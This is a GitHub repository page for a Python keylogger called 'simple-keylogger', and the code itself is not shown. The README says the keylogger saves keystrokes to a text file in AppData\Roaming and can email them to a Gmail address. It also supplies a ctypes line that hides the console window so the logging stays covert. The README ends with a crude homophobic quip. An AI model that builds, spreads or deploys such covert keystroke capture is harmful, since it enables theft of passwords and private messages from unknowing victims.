Skip to content

yukixyz/simple-keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

simple-keylogger

Simple keylogger created in python, which creates a .txt file in your AppData\Roaming and saves any compatible key, the software is not compiled to .exe, you have the option to send everything to your gmail, you just have to change some part of the code

If you want the console to not be visible, simply add this command to one of the first lines

ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)

btw sell it = g4y

Releases

No releases published

Packages

No packages published

Languages